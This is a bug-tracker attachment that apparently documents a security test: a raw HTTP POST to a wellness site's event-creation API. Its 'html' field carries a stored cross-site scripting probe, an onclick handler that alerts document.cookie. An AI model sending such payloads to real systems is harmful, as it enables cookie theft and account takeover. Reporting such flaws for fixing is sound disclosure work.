Project

General

Profile

Bug #13 » POST httpsapi akinderwellness.txt

Post request format used for the test - Vivek Kumar, 03/12/2026 07:53 AM

 
POST https://api.akinderwellness.com:4001/api/events/create HTTP/1.1
Host: api.akinderwellness.com:4001
Connection: keep-alive
Content-Length: 37751
sec-ch-ua-platform: "Windows"
Authorization: Bearer TOKEN(Hidden for safety)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
sec-ch-ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycfKMAVxpWAQs63eq
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://dev.akinderwellness.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://dev.akinderwellness.com/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundarycfKMAVxpWAQs63eq
Content-Disposition: form-data; name="title"

Test event
------WebKitFormBoundarycfKMAVxpWAQs63eq
Content-Disposition: form-data; name="html"

<p>Hello<a onclick="alert(document.cookie)" target="_blank" rel="noopener noreferrer nofollow" class="text-purple-500 hover:text-purple-600 underline decoration-2 transition-colors" href="https://vivek.tech">Hi</a></p>
------WebKitFormBoundarycfKMAVxpWAQs63eq
Content-Disposition: form-data; name="text"

HelloHi
------WebKitFormBoundarycfKMAVxpWAQs63eq
Content-Disposition: form-data; name="categories"

["6270691f2032fc5901ce3c00"]
------WebKitFormBoundarycfKMAVxpWAQs63eq
Content-Disposition: form-data; name="cover"; filename="UI Bug AKW0002.jpeg"
Content-Type: image/jpeg

<<<<<<<BINARY IMAGE CONTENT>>>>>>>
(2-2/3)